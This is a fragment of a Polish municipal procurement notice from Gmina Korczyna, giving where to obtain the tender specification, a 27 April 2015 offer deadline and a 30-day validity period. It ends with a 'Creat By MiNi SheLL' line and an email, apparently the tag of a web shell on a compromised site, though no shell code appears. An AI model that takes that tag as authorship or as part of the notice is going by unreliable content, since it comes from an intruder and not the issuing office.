<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.korczyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Korczyna
38-420 Korczyna ul. Rynek 18a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2015 godzina 09:30, miejsce: Urząd Gminy Korczyna
38-420 Korczyna ul. Rynek 18a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com